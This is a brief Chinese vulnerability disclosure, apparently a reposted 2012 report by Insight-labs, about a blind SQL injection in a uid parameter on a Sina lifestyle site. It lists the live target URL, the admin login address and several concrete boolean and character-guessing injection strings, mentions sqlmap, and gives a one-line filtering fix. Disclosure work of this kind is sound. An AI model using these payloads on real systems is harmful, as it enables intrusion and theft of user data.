新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)
注入漏洞存在地址为<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310<br />其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。<br /> <br />同时,团购的商户登陆地址为<br />http://life.sina.com.cn/tuanadmin<br /> <br />漏洞证明:下面为手工猜解数据库名的语句为<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102<br />http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101<br />下图为注入是返回对正确与错误的截图<br /> <br /> <img alt="" src="https://img.jbzj.com/file_images/article/201206/2012060109422615.jpg" /><br /> <br />注入返回对的情况截图<br /> <br /> <img alt="" src="https://img.jbzj.com/file_images/article/201206/2012060109422616.jpg" /><br /> <br />注入时返回错的情况截图<br /> <br />一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。<br /> <br /><img alt="" src="https://img.jbzj.com/file_images/article/201206/2012060109422617.jpg" /><br /> <br /><font color="#ff0000">修复方案:<br /></font><br />对其uid参数进行检查并且进行过滤。<br /> <br />作者 Insight-labs
頁:
[1]